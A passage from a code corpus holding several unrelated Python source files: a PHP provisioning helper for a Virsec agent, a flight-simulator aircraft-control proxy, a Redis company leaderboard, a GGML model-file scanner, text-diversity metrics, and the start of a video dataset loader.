'/RunCloud/Packages/php71rc/bin',\r\n '/RunCloud/Packages/php72rc/bin',\r\n '/RunCloud/Packages/php73rc/bin',\r\n '/RunCloud/Packages/php74rc/bin',\r\n '/RunCloud/Packages/php80rc/bin',\r\n\r\n '/opt/bitnami/php/bin',\r\n '/opt/bitnami/php-7.0/bin',\r\n '/opt/bitnami/php-7.1/bin',\r\n '/opt/bitnami/php-7.2/bin',\r\n '/opt/bitnami/php-7.3/bin',\r\n '/opt/bitnami/php-7.4/bin',\r\n '/opt/bitnami/php-8.0/bin',\r\n '/opt/bitnami/php/7.0/bin',\r\n '/opt/bitnami/php/7.1/bin',\r\n '/opt/bitnami/php/7.2/bin',\r\n '/opt/bitnami/php/7.3/bin',\r\n '/opt/bitnami/php/7.4/bin',\r\n '/opt/bitnami/php/8.0/bin',\r\n ]\r\n\r\n def InstalledPhps(self, reqVer):\r\n folders = os.environ.get('PATH', '').split(':') + self.__class__.KnownFolders\r\n folders = list(set(folders))\r\n insldPhp = []\r\n for fldr in folders:\r\n fndPhps = self.CheckPhp(fldr)\r\n if fndPhps:\r\n for foundPhp in fndPhps:\r\n if foundPhp.Version() == reqVer:\r\n 
insldPhp.append(foundPhp)\r\n\r\n return insldPhp\r\n\r\n def CheckPhp(self, fldr):\r\n phps = []\r\n if os.path.isdir(fldr):\r\n for name in os.listdir(fldr):\r\n if re.match('(zts-)?php([57])?(-fpm)?(-?\\d(\\.?\\d+)?)?$', name):\r\n file_path = os.path.join(fldr, name)\r\n with open(file_path, 'rb') as fd:\r\n if fd.read(4) != b\"\\x7fELF\":\r\n continue\r\n phps.append(Php(file_path))\r\n\r\n return phps\r\n\r\ndef validateArgs(docRoot):\r\n if not os.path.isdir(docRoot):\r\n return False\r\n return True\r\n \r\n\r\ndef provPhp(action, docRoot, webServer, phpVersion, phpConfigFolder, appContextPath, refCount:int):\r\n status = validateArgs(docRoot)\r\n if status is False:\r\n error = \"Doc %s root is not present\" % docRoot\r\n logging.critical(error)\r\n return False\r\n\r\n logging.debug(\"PHP application - action %s docRoot %s,\"\r\n \"webServer %s, phpVersion %s, phpConfigFolder %s, appContextPath %s, refCount %s\"\r\n % (action, docRoot, webServer, phpVersion, phpConfigFolder, appContextPath, refCount))\r\n\r\n# Action: Cleanup -> refcount is not ZERO\r\n if action == \"clean\":\r\n if refCount > 1:\r\n removeAppFiles(docRoot)\r\n return True\r\n\r\n vspIniFilePath = os.path.join(VSP_OPT_FOLDER, PHP_IAE_DIR, phpVersion, VSP_INI_FILE)\r\n if not os.path.isfile(vspIniFilePath):\r\n error = \"File not found - %s\" % vspIniFilePath\r\n logging.critical(error)\r\n return False\r\n\r\n knownPhps = PhpKnownLocation().InstalledPhps(phpVersion)\r\n instldPhpPackgs = PhpDebianPackages().InstalledPhpPackages(phpVersion)\r\n\r\n instldPhps = list()\r\n\r\n if (phpConfigFolder and not phpConfigFolder.isspace()):\r\n if os.path.isdir(phpConfigFolder):\r\n instldPhps.append(Php(\"custom\", phpConfigFolder, phpVersion))\r\n else:\r\n error = \"Configured PHP coniguration folder %s does not exist\" % phpConfigFolder\r\n logging.critical(error)\r\n return False\r\n else:\r\n if (knownPhps):\r\n instldPhps.extend(knownPhps)\r\n if (instldPhpPackgs):\r\n instldPhps.extend(instldPhpPackgs)\r\n\r\n logging.debug(\"Installed packages - %d - %s\" % (len(instldPhps), instldPhps))\r\n\r\n if len(instldPhps) == 0:\r\n error = \"No Installed packages found check if php %s is installed\" % phpVersion\r\n logging.warning(error)\r\n return False\r\n\r\n provisionedPhp = list()\r\n for ipcg in instldPhps:\r\n logging.debug(\"PHP Config folder %s\" % (ipcg.ConfigFolder()))\r\n\r\n if ipcg.ConfigFolder() in provisionedPhp or ipcg.IsZts():\r\n continue\r\n\r\n targetIniPath = os.path.join(ipcg.ConfigFolder(), \"vsp.ini\")\r\n\r\n provisionedPhp.append(ipcg.ConfigFolder())\r\n\r\n# Action: Provision\r\n if action == \"prov\":\r\n logging.debug(\"Copying file %s to %s\" % (vspIniFilePath, targetIniPath))\r\n shutil.copyfile(vspIniFilePath, targetIniPath)\r\n os.chmod(targetIniPath, 0o644)\r\n virsecIae = os.path.join(docRoot, \"VirsecIae.config\")\r\n virsecResource = os.path.join(docRoot, \"virsecresources.php\")\r\n if(os.path.isfile(virsecIae)):\r\n os.remove(targetIniPath)\r\n logging.debug(\"file already present %s , removed %s \" %( virsecIae, virsecIae))\r\n with open(os.path.join(docRoot, \"VirsecIae.config\"), 'w') as vcfg:\r\n dictionary:dict = dict()\r\n dictionary[\"LogPath\"] = \"/var/virsec/log\"\r\n dictionary[\"LogLevel\"] = \"Info\"\r\n dictionary[\"AppCtx\"] = appContextPath\r\n json_object = json.dumps(dictionary, indent = 4)\r\n vcfg.write(json_object)\r\n logging.debug(\"saved file contents are %s \" % json_object)\r\n os.chmod(os.path.join(docRoot, \"VirsecIae.config\"), 0o755)\r\n 
logging.debug(\"Success: created file %s\" % virsecIae)\r\n vcfg.close()\r\n\r\n if(os.path.isfile(virsecResource)):\r\n os.remove(virsecResource)\r\n logging.debug(\"file already present %s , removed %s \" %( virsecResource, virsecResource))\r\n with open(virsecResource, 'w') as vcfg:\r\n os.chmod(virsecResource, 0o755)\r\n logging.debug(\"Success: created file %s\" % virsecResource)\r\n vcfg.close()\r\n ProcessUtil.selinuxLoadAndCompilePolicyModule(action)\r\n #ProcessUtil.restartPhp(webServer, phpVersion)\r\n\r\n# Action: Cleanup -> refcount is 1 i.e last \r\n elif action == \"clean\":\r\n if refCount <= 1:\r\n logging.debug(\"Trying to remove file %s\" % targetIniPath)\r\n if os.path.isfile(targetIniPath):\r\n os.remove(targetIniPath)\r\n logging.debug(\"Success: removed file %s\" % targetIniPath)\r\n else:\r\n logging.debug(\"File not found %s\" % targetIniPath)\r\n ProcessUtil.selinuxLoadAndCompilePolicyModule(action)\r\n #ProcessUtil.restartPhp(webServer, phpVersion)\r\n removeAppFiles(docRoot)\r\n return True\r\n\r\ndef removeAppFiles(docRoot):\r\n virsecIae = os.path.join(docRoot, \"VirsecIae.config\")\r\n virsecResource = os.path.join(docRoot, \"virsecresources.php\")\r\n if (os.path.isfile(virsecIae)):\r\n logging.debug(\"Removing file %s\" % (os.path.join(docRoot, \"VirsecIae.config\")))\r\n os.remove(os.path.join(docRoot, \"VirsecIae.config\")) \r\n logging.debug(\"Success: removed file %s\" % virsecIae)\r\n \r\n if (os.path.isfile(virsecResource)):\r\n logging.debug(\"Removing file %s\" % (os.path.join(docRoot, \"virsecresources.php\")))\r\n os.remove(os.path.join(docRoot, \"virsecresources.php\"))\r\n logging.debug(\"Success: removed file %s\" % virsecResource)\r\n","repo_name":"arymangupta/python_utils","sub_path":"provphp.py","file_name":"provphp.py","file_ext":"py","file_size_in_byte":14846,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"29899319990","text":"\"\"\"\nContains the ProxyAircraftControls class\n\"\"\"\nimport copy\nimport logging\nfrom typing import Dict\nfrom typing import List\nfrom typing import Optional\nfrom typing import Tuple\nfrom typing import Union\n\nfrom aviary.sector.route import Route\nfrom aviary.sector.sector_element import SectorElement\n\nimport bluebird.utils.types as types\nfrom bluebird.utils.abstract_aircraft_controls import AbstractAircraftControls\nfrom bluebird.utils.properties import AircraftProperties\n\n\nclass ProxyAircraftControls(AbstractAircraftControls):\n \"\"\"Proxy implementation of AbstractAircraftControls\"\"\"\n\n @property\n def all_properties(self) -> Union[Dict[types.Callsign, AircraftProperties], str]:\n self._logger.debug(\"all_properties: Accessed\")\n if self._data_valid:\n self._logger.debug(\"all_properties: Using cache\")\n return self._ac_props\n all_props = self._aircraft_controls.all_properties\n if not isinstance(all_props, dict):\n return all_props\n for callsign in list(self._ac_props):\n if callsign not in all_props:\n self._logger.warning(\n f\"all_properties: Aircraft {callsign} has \"\n \"been removed from the simulation\"\n )\n self._ac_props.pop(callsign, None)\n continue\n self._update_ac_properties(callsign, all_props[callsign])\n self._logger.debug(\"all_properties: Data now valid\")\n self._data_valid = True\n return self._ac_props\n\n @property\n def callsigns(self) -> Union[List[types.Callsign], str]:\n if not self._data_valid:\n err = self.all_properties\n if isinstance(err, str):\n return err\n return 
list(self._ac_props.keys())\n\n def __init__(self, aircraft_controls: AbstractAircraftControls):\n self._logger = logging.getLogger(__name__)\n self._aircraft_controls = aircraft_controls\n\n self._ac_props: Dict[types.Callsign, Optional[AircraftProperties]] = {}\n self._prev_ac_props: Dict[types.Callsign, Optional[AircraftProperties]] = {}\n self._routes: Dict[str, Route] = {}\n self._data_valid: bool = False\n\n def set_cleared_fl(\n self, callsign: types.Callsign, flight_level: types.Altitude, **kwargs\n ) -> Optional[str]:\n err = self._aircraft_controls.set_cleared_fl(callsign, flight_level, **kwargs)\n if err:\n return err\n self._ac_props[callsign].cleared_flight_level = flight_level\n return None\n\n def set_heading(\n self, callsign: types.Callsign, heading: types.Heading\n ) -> Optional[str]:\n return self._aircraft_controls.set_heading(callsign, heading)\n\n def set_ground_speed(\n self, callsign: types.Callsign, ground_speed: types.GroundSpeed\n ) -> Optional[str]:\n return self._aircraft_controls.set_ground_speed(callsign, ground_speed)\n\n def set_vertical_speed(\n self, callsign: types.Callsign, vertical_speed: types.VerticalSpeed\n ) -> Optional[str]:\n return self._aircraft_controls.set_vertical_speed(callsign, vertical_speed)\n\n def direct_to_waypoint(\n self, callsign: types.Callsign, waypoint: str\n ) -> Optional[str]:\n props = self.properties(callsign)\n if not isinstance(props, AircraftProperties):\n return props\n if not props.route_name:\n return \"Aircraft has no route\"\n route_waypoints = [x[0] for x in self._routes[props.route_name].fix_list]\n if waypoint not in route_waypoints:\n return f'Waypoint \"{waypoint}\" is not in the route {route_waypoints}'\n return self._aircraft_controls.direct_to_waypoint(callsign, waypoint)\n\n def create(\n self,\n callsign: types.Callsign,\n ac_type: str,\n position: types.LatLon,\n heading: types.Heading,\n altitude: types.Altitude,\n gspd: types.GroundSpeed,\n ) -> Optional[str]:\n # NOTE(RKM 2019-11-20) Creating an aircraft with a specified route is currently\n # not implemented\n exists = self.exists(callsign)\n if not isinstance(exists, bool):\n return exists\n if self.exists(callsign):\n return \"Aircraft already exists\"\n err = self._aircraft_controls.create(\n callsign, ac_type, position, heading, altitude, gspd\n )\n if err:\n return err\n # Create an empty entry for the new aircraft and ensure we get new data back\n self._ac_props[callsign] = None\n self._data_valid = False\n all_properties = self.all_properties\n if not isinstance(all_properties, dict):\n return all_properties\n return (\n None if callsign in all_properties else \"New callsign missing from sim data\"\n )\n\n def exists(self, callsign: types.Callsign) -> Union[bool, str]:\n all_callsings = self.callsigns\n return (\n bool(callsign in all_callsings)\n if isinstance(all_callsings, list)\n else all_callsings\n )\n\n def properties(self, callsign: types.Callsign) -> Union[AircraftProperties, str]:\n \"\"\"Utility function to return only the properties for the specified aircraft\"\"\"\n all_props = self.all_properties\n if not isinstance(all_props, dict):\n return all_props\n return all_props.get(callsign, None) or f\"Unknown callsign {callsign}\"\n\n def route(self, callsign: types.Callsign) -> Union[Tuple[str, str, List[str]], str]:\n \"\"\"Utility function to return only the route for the specified aircraft\"\"\"\n props = self.properties(callsign)\n if not isinstance(props, AircraftProperties):\n return props\n if not props.route_name:\n return 
\"Aircraft has no route\"\n\n route = self._routes[props.route_name]\n next_waypoint = route.next_waypoint(\n props.position.lat_degrees, props.position.lon_degrees\n )\n return (props.route_name, next_waypoint, [x[0] for x in route.fix_list])\n\n def invalidate_data(self, clear: bool = False) -> None:\n \"\"\"Clears the data_valid flag\"\"\"\n if clear:\n self._ac_props = {}\n self._prev_ac_props = {}\n self._data_valid = False\n\n def store_current_props(self):\n # TODO(rkm 2020-01-12) In sandbox mode, this needs to be hooked-up to a timer\n # which stores the current state every n seconds\n self._prev_ac_props = copy.deepcopy(self._ac_props)\n\n def prev_ac_props(self) -> Dict[types.Callsign, Optional[AircraftProperties]]:\n # NOTE(rkm 2020-01-29) Defensive copy\n return copy.deepcopy(self._prev_ac_props)\n\n def set_initial_properties(\n self, sector_element: SectorElement, scenario_content: dict\n ) -> None:\n \"\"\"\n Set any properties which are not tracked by the simulator - i.e. the flight\n levels, routes, and aircraft types\n \"\"\"\n\n for route in sector_element.routes():\n self._routes[route.name] = route\n\n new_props: Dict[types.Callsign, AircraftProperties] = {}\n for aircraft in scenario_content[\"aircraft\"]:\n callsign = types.Callsign(aircraft[\"callsign\"])\n new_props[callsign] = AircraftProperties.from_data(aircraft)\n if \"route\" not in aircraft:\n new_props[callsign].route_name = None\n continue\n # Match the route name to the waypoints in the scenario data\n aircraft_route_waypoints = [x[\"fixName\"] for x in aircraft[\"route\"]]\n new_props[callsign].route_name = next(\n x\n for x in self._routes\n if self._routes[x].fix_names() == aircraft_route_waypoints\n )\n\n self._ac_props = new_props\n self._data_valid = False\n\n def _update_ac_properties(\n self, callsign: types.Callsign, new_props: AircraftProperties\n ):\n \"\"\"Updates the stored AircraftProperties with new data from the simulator\"\"\"\n # NOTE(rkm 2020-01-12) If we don't have any existing properties, then that means\n # this is an aircraft that has been created after the scenario has been started.\n # We therefore (currently) don't have any route or req. 
flight level information\n if not self._ac_props[callsign]:\n self._ac_props[callsign] = new_props\n else:\n props = self._ac_props[callsign]\n props.altitude = new_props.altitude\n props.ground_speed = new_props.ground_speed\n props.heading = new_props.heading\n props.position = new_props.position\n props.vertical_speed = new_props.vertical_speed\n","repo_name":"project-bluebird/bluebird","sub_path":"bluebird/sim_proxy/proxy_aircraft_controls.py","file_name":"proxy_aircraft_controls.py","file_ext":"py","file_size_in_byte":8742,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"81"} +{"seq_id":"74279247306","text":"import os\nimport json\nimport enum\nimport logging\n\nfrom django.conf import settings\nfrom redis import Redis, RedisError, ConnectionError\n\nlogger = logging.getLogger(__name__)\n\nclass RankSortKeys(enum.Enum):\n ALL = 'all'\n TOP10 = 'top10'\n BOTTOM10 = 'bottom10'\n\n\nclass RedisClient:\n def __init__(self):\n try:\n if settings.REDIS_URL:\n self.redis_client = Redis.from_url(\n url=settings.REDIS_URL,\n decode_responses=True\n )\n else:\n self.redis_client = Redis(\n host=settings.REDIS_HOST,\n port=settings.REDIS_PORT,\n password=settings.REDIS_PASSWORD,\n db=settings.REDIS_DB,\n decode_responses=True\n )\n except RedisError:\n logger.error(f'Redis failed connection to {settings.REDIS_HOST}:{settings.REDIS_PORT}.')\n return\n\n def set_init_data(self):\n with open(os.path.join(settings.BASE_DIR, 'companies_data.json'), 'r') as init_data:\n companies = json.load(init_data)\n try:\n for company in companies:\n symbol = self.add_prefix_to_symbol(settings.REDIS_PREFIX, company.get('symbol').lower())\n self.redis_client.zadd(\n settings.REDIS_LEADERBOARD,\n {\n symbol: company.get('marketCap')\n }\n )\n\n self.redis_client.hset(\n symbol,\n 'company',\n company.get('company')\n )\n self.redis_client.hset(\n symbol,\n 'country',\n company.get('country')\n )\n except ConnectionError:\n if settings.REDIS_URL:\n error_message = f'Redis connection time out to {settings.REDIS_URL}.'\n else:\n error_message = f'Redis connection time out to {settings.REDIS_HOST}:{settings.REDIS_PORT}.'\n logger.error(error_message)\n return\n\n @staticmethod\n def add_prefix_to_symbol(prefix, symbol):\n return f\"{prefix}:{symbol}\"\n\n @staticmethod\n def remove_prefix_to_symbol(prefix, symbol):\n return symbol.replace(f'{prefix}:', '')\n\n\nclass CompaniesRanks(RedisClient):\n def update_company_market_capitalization(self, amount, symbol):\n self.redis_client.zincrby(settings.REDIS_LEADERBOARD, amount, self.add_prefix_to_symbol(settings.REDIS_PREFIX, symbol))\n\n def get_ranks_by_sort_key(self, key):\n sort_key = RankSortKeys(key)\n\n if sort_key is RankSortKeys.ALL:\n return self.get_zrange(0, -1)\n elif sort_key is RankSortKeys.TOP10:\n return self.get_zrange(0, 9)\n elif sort_key is RankSortKeys.BOTTOM10:\n return self.get_zrange(0, 9, False)\n \n def get_ranks_by_symbols(self, symbols):\n companies_capitalization = [\n self.redis_client.zscore(settings.REDIS_LEADERBOARD, self.add_prefix_to_symbol(settings.REDIS_PREFIX, symbol))\n for symbol in symbols\n ]\n companies = []\n\n for index, market_capitalization in enumerate(companies_capitalization):\n companies.append([\n self.add_prefix_to_symbol(settings.REDIS_PREFIX, symbols[index]),\n market_capitalization\n ])\n\n return self.get_result(companies)\n\n def get_zrange(self, start_index, stop_index, desc=True):\n query_args = {\n 'name': settings.REDIS_LEADERBOARD,\n 'start': start_index,\n 'end': 
stop_index,\n 'withscores': True,\n 'score_cast_func': str,\n }\n\n if desc:\n companies = self.redis_client.zrevrange(**query_args)\n else:\n companies = self.redis_client.zrange(**query_args)\n\n return self.get_result(companies, start_index, desc)\n\n def get_result(self, companies, start_index=0, desc=True):\n start_rank = int(start_index) + 1 if desc else (len(companies) - start_index)\n increase_factor = 1 if desc else -1\n results = []\n\n for company in companies:\n symbol = company[0]\n market_cap = company[1]\n company_info = self.redis_client.hgetall(symbol)\n results.append(\n {\n 'company': company_info['company'],\n 'country': company_info['country'],\n 'marketCap': market_cap,\n 'rank': start_rank,\n 'symbol': self.remove_prefix_to_symbol(settings.REDIS_PREFIX, symbol)\n }\n )\n start_rank += increase_factor\n\n return json.dumps(results)\n","repo_name":"xxl4tomxu98/redis-leaderboard-django","sub_path":"server/core/companies_redis.py","file_name":"companies_redis.py","file_ext":"py","file_size_in_byte":4954,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"81"} +{"seq_id":"40390989704","text":"import os\nimport io\nimport stat\nimport uuid\nimport struct\n\nfrom typing import IO\n#########################################################################\n# Functions for API calls\n#########################################################################\n\n\"\"\"\n- @ Scan directory find all models files\n- return list of models dict\n\"\"\"\n\ndef directory_scan(dir_path, ls_res):\n\n content = os.scandir(dir_path)\n\n for item in content:\n if item.is_file():\n\n (path, fl) = os.path.split(item.path)\n\n with open(item.path, \"rb\") as in_file :\n\n try:\n data = lazy_load_ggml_file(in_file)\n #print('vocab:{} embd:{} mult:{} head:{} layer:{} rot:{} file_type:{}'.format(\n # data[0],data[1],data[2],data[3],data[4],data[5],data[6]))\n\n dc_res = {}\n info = item.stat()\n dc_res['id'] = str(uuid.uuid5(uuid.NAMESPACE_DNS, fl))[:8]\n dc_res['name'] = fl\n dc_res['path'] = path\n dc_res['size'] = info.st_size\n\n dc_res['vocab']= data[0]\n dc_res['embd'] = data[1]\n dc_res['mult'] = data[2]\n dc_res['head'] = data[3]\n dc_res['layer']= data[4]\n dc_res['rot'] = data[5]\n dc_res['file_type'] = data[6]\n dc_res['active'] = False\n\n ls_res.append(dc_res)\n\n except Exception as ex:\n pass\n\n else:\n directory_scan(item.path, ls_res)\n\n#########################################################################\n\"\"\"\n- @ Read from file number of bytes\n- return byte array\n\"\"\"\n\ndef must_read(fp: IO[bytes], length: int) -> bytes:\n ret = fp.read(length)\n if len(ret) < length:\n raise Exception(\"unexpectedly reached end of file\")\n return ret\n\n#########################################################################\n\"\"\"\n- @ Read from file number of bytes\n- return byte array\n\"\"\"\n\ndef lazy_load_ggml_file(fp: io.BufferedReader) -> list:\n magic = must_read(fp, 4)[::-1]\n\n if magic in (b'ggjt',b'ggml'):\n version, = struct.unpack(\"i\", must_read(fp, 4))\n# assert version == 1\n else:\n assert magic == b'ggml'\n version = None\n\n n_vocab, n_embd, n_mult, n_head, n_layer, rot, file_type = struct.unpack('<7i', must_read(fp, 28))\n\n return [n_vocab, n_embd, n_mult, n_head, n_layer, rot, file_type]\n\n#########################################################################\n\"\"\"\n- @ Get file type descrition\n- return string\n\"\"\"\n\ndef file_type_str(tp: int) -> str:\n\n if tp == 0 :\n return 'ALL_F32'\n elif tp == 
1 :\n return 'F16'\n elif tp == 2 :\n return 'Q4_0'\n elif tp == 3 :\n return 'Q4_1'\n elif tp == 4 :\n return 'Q4_1_SOME_F16'\n elif tp == 7 :\n return 'Q8_0'\n elif tp == 8 :\n return 'Q5_0'\n elif tp == 9 :\n return 'Q5_1'\n elif tp == 10 :\n return 'Q2_K'\n elif tp == 11 :\n return 'Q3_K_S'\n elif tp == 12 :\n return 'Q3_K_M'\n elif tp == 13 :\n return 'Q3_K_L'\n elif tp == 14 :\n return 'Q4_K_S'\n elif tp == 15 :\n return 'Q4_K_M'\n elif tp == 16 :\n return 'Q5_K_S'\n elif tp == 17 :\n return 'Q5_K_M'\n elif tp == 18 :\n return 'Q6_K'\n\n return \"UNK\"\n#########################################################################\n","repo_name":"pkarbov/nextcloud-llama-pod","sub_path":"llama_pod/services/llama/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"10711926502","text":"import nltk\nimport numpy as np\nfrom nltk.translate.bleu_score import corpus_bleu\nimport argparse\nimport json\n\ndef distinct_4gram(rand_5):\n dist4_list = []\n for hyp5 in rand_5:\n hyp_4grams = []\n for hyp in hyp5:\n hyp_4grams += nltk.ngrams(hyp.split(), 4)\n total_4grams = len(hyp_4grams)\n unique_4grams = len(list(set(hyp_4grams)))\n if total_4grams == 0:\n continue\n dist_4 = unique_4grams/total_4grams\n dist4_list.append(dist_4)\n print('Distinct 4-grams:', np.mean(dist4_list))\n \ndef compute_self_bleu(rand_5):\n ref_list, hyp_list = [], []\n for i in range(len(rand_5)):\n hyp_all = rand_5[i]\n if len(hyp_all) < 2: continue\n for j, hyp in enumerate(hyp_all):\n cur_ref = hyp_all.copy()\n cur_ref.pop(j)\n tmp = []\n for ref in cur_ref:\n tmp.append(ref.split())\n ref_list.append(tmp)\n hyp_list.append(hyp.split())\n \n score = corpus_bleu(ref_list, hyp_list)\n print(\"Self-BLEU: \"+str(score))\n \n \ndef unique_sentence(rand_10):\n uni_list = []\n for i in range(len(rand_10)):\n all_sent_list = rand_10[i]\n uni_sents = list(set(all_sent_list))\n uni_list.append(len(uni_sents)/len(all_sent_list))\n \n uni = np.mean(uni_list)\n print('Number of Unique Sentences:', uni)\n \n \nif __name__ == '__main__':\n p = argparse.ArgumentParser(description='Hyperparams')\n p.add_argument('-op', '--output_path', type=str, default=\"../models/transformer/t5-base_GYAFC/\")\n p.add_argument('-of', '--output_file', type=str, default=\"em_ae_2021-09-09-13-13-04/outs.json\")\n args = p.parse_args()\n\n# rand_5 = [\n# ['you can now check on a facebook chatbot', 'you can now check this .', \n# 'you can now check on a facebook chatbot', 'you should check it on facebook',\n# 'please check on a facebook chatbot'],\n# ]\n# rand_10 = [\n# ['you can now check on a facebook chatbot', 'you can now check this .', \n# 'you can now check on a facebook chatbot', 'you should check it on facebook',\n# 'please check on a facebook chatbot', \n# 'you can now check on a facebook chatbot', 'you can now check this .', \n# 'you can now check on a facebook chatbot', 'you should check it on facebook',\n# 'please check on a facebook chatbot'],\n# ]\n\n with open(args.output_path + args.output_file, 'r') as f:\n outputs = json.load(f)['values']\n rand_5 = [output['generated'].split('\\t')[:5] for output in outputs]\n rand_10 = [output['generated'].split('\\t') for output in outputs]\n\n distinct_4gram(rand_5)\n compute_self_bleu(rand_5)\n 
unique_sentence(rand_10)","repo_name":"wyu-du/GP-VAE","sub_path":"metrics/diversity.py","file_name":"diversity.py","file_ext":"py","file_size_in_byte":2816,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"81"} +{"seq_id":"73962830665","text":"import copy\nimport random\nfrom collections import OrderedDict\n\nimport torch\n\nfrom imaginaire.datasets.base import BaseDataset\nfrom imaginaire.model_utils.fs_vid2vid import select_object\nfrom imaginaire.utils.distributed import master_only_print as print\n\n\nclass Dataset(BaseDataset):\n r\"\"\"Paired video dataset for use in vid2vid, wc_vid2vid.\n\n Args:\n cfg (Config): Loaded config object.\n is_inference (bool): In train or inference mode?\n sequence_length (int): What sequence of images to provide?\n \"\"\"\n\n def __init__(self, cfg,\n is_inference=False,\n sequence_length=None,\n is_test=False):\n self.paired = True\n # Get initial sequence length.\n if sequence_length is None and not is_inference:\n self.sequence_length = cfg.data.train.initial_sequence_length\n elif sequence_length is None and is_inference:\n self.sequence_length = 2\n else:\n self.sequence_length = sequence_length\n super(Dataset, self).__init__(cfg, is_inference, is_test)\n self.set_sequence_length(self.sequence_length)\n self.is_video_dataset = True\n\n def get_label_lengths(self):\n r\"\"\"Get num channels of all labels to be concated.\n\n Returns:\n label_lengths (OrderedDict): Dict mapping image data_type to num\n channels.\n \"\"\"\n label_lengths = OrderedDict()\n for data_type in self.input_labels:\n data_cfg = self.cfgdata\n if hasattr(data_cfg, 'one_hot_num_classes') and data_type in data_cfg.one_hot_num_classes:\n label_lengths[data_type] = data_cfg.one_hot_num_classes[data_type]\n if getattr(data_cfg, 'use_dont_care', False):\n label_lengths[data_type] += 1\n else:\n label_lengths[data_type] = self.num_channels[data_type]\n return label_lengths\n\n def num_inference_sequences(self):\n r\"\"\"Number of sequences available for inference.\n\n Returns:\n (int)\n \"\"\"\n assert self.is_inference\n return len(self.mapping)\n\n def set_inference_sequence_idx(self, index):\n r\"\"\"Get frames from this sequence during inference.\n\n Args:\n index (int): Index of inference sequence.\n \"\"\"\n assert self.is_inference\n assert index < len(self.mapping)\n self.inference_sequence_idx = index\n self.epoch_length = len(\n self.mapping[self.inference_sequence_idx]['filenames'])\n\n def set_sequence_length(self, sequence_length):\n r\"\"\"Set the length of sequence you want as output from dataloader.\n\n Args:\n sequence_length (int): Length of output sequences.\n \"\"\"\n assert isinstance(sequence_length, int)\n if sequence_length > self.sequence_length_max:\n print('Requested sequence length (%d) > ' % (sequence_length) +\n 'max sequence length (%d). 
' % (self.sequence_length_max) +\n 'Limiting sequence length to max sequence length.')\n sequence_length = self.sequence_length_max\n self.sequence_length = sequence_length\n # Recalculate mapping as some sequences might no longer be useful.\n self.mapping, self.epoch_length = self._create_mapping()\n print('Epoch length:', self.epoch_length)\n\n def _compute_dataset_stats(self):\n r\"\"\"Compute statistics of video sequence dataset.\n\n Returns:\n sequence_length_max (int): Maximum sequence length.\n \"\"\"\n print('Num datasets:', len(self.sequence_lists))\n\n if self.sequence_length >= 1:\n num_sequences, sequence_length_max = 0, 0\n for sequence in self.sequence_lists:\n for _, filenames in sequence.items():\n sequence_length_max = max(\n sequence_length_max, len(filenames))\n num_sequences += 1\n print('Num sequences:', num_sequences)\n print('Max sequence length:', sequence_length_max)\n self.sequence_length_max = sequence_length_max\n\n def _create_mapping(self):\n r\"\"\"Creates mapping from idx to key in LMDB.\n\n Returns:\n (tuple):\n - self.mapping (dict): Dict of seq_len to list of sequences.\n - self.epoch_length (int): Number of samples in an epoch.\n \"\"\"\n # Create dict mapping length to sequence.\n length_to_key, num_selected_seq = {}, 0\n total_num_of_frames = 0\n for lmdb_idx, sequence_list in enumerate(self.sequence_lists):\n for sequence_name, filenames in sequence_list.items():\n if len(filenames) >= self.sequence_length:\n total_num_of_frames += len(filenames)\n if len(filenames) not in length_to_key:\n length_to_key[len(filenames)] = []\n length_to_key[len(filenames)].append({\n 'lmdb_root': self.lmdb_roots[lmdb_idx],\n 'lmdb_idx': lmdb_idx,\n 'sequence_name': sequence_name,\n 'filenames': filenames,\n })\n num_selected_seq += 1\n self.mapping = length_to_key\n self.epoch_length = num_selected_seq\n if not self.is_inference and self.epoch_length < \\\n self.cfgdata.train.batch_size * 8:\n self.epoch_length = total_num_of_frames\n\n # At inference time, we want to use all sequences,\n # irrespective of length.\n if self.is_inference:\n sequence_list = []\n for key, sequences in self.mapping.items():\n sequence_list.extend(sequences)\n self.mapping = sequence_list\n\n return self.mapping, self.epoch_length\n\n def _sample_keys(self, index):\n r\"\"\"Gets files to load for this sample.\n\n Args:\n index (int): Index in [0, len(dataset)].\n Returns:\n key (dict):\n - lmdb_idx (int): Chosen LMDB dataset root.\n - sequence_name (str): Chosen sequence in chosen dataset.\n - filenames (list of str): Chosen filenames in chosen sequence.\n \"\"\"\n if self.is_inference:\n assert index < self.epoch_length\n chosen_sequence = self.mapping[self.inference_sequence_idx]\n chosen_filenames = [chosen_sequence['filenames'][index]]\n else:\n # Pick a time step for temporal augmentation.\n time_step = random.randint(1, self.augmentor.max_time_step)\n required_sequence_length = 1 + \\\n (self.sequence_length - 1) * time_step\n\n # If step is too large, default to step size of 1.\n if required_sequence_length > self.sequence_length_max:\n required_sequence_length = self.sequence_length\n time_step = 1\n\n # Find valid sequences.\n valid_sequences = []\n for sequence_length, sequences in self.mapping.items():\n if sequence_length >= required_sequence_length:\n valid_sequences.extend(sequences)\n\n # Pick a sequence.\n chosen_sequence = random.choice(valid_sequences)\n\n # Choose filenames.\n max_start_idx = len(chosen_sequence['filenames']) - \\\n required_sequence_length\n start_idx = 
random.randint(0, max_start_idx)\n\n chosen_filenames = chosen_sequence['filenames'][\n start_idx:start_idx + required_sequence_length:time_step]\n assert len(chosen_filenames) == self.sequence_length\n\n # Prepre output key.\n key = copy.deepcopy(chosen_sequence)\n key['filenames'] = chosen_filenames\n return key\n\n def _create_sequence_keys(self, sequence_name, filenames):\n r\"\"\"Create the LMDB key for this piece of information.\n\n Args:\n sequence_name (str): Which sequence from the chosen dataset.\n filenames (list of str): List of filenames in this sequence.\n Returns:\n keys (list): List of full keys.\n \"\"\"\n assert isinstance(filenames, list), 'Filenames should be a list.'\n keys = []\n if sequence_name.endswith('___') and sequence_name[-9:-6] == '___':\n sequence_name = sequence_name[:-9]\n for filename in filenames:\n keys.append('%s/%s' % (sequence_name, filename))\n return keys\n\n def _getitem(self, index):\n r\"\"\"Gets selected files.\n\n Args:\n index (int): Index into dataset.\n concat (bool): Concatenate all items in labels?\n Returns:\n data (dict): Dict with all chosen data_types.\n \"\"\"\n # Select a sample from the available data.\n keys = self._sample_keys(index)\n\n # Unpack keys.\n 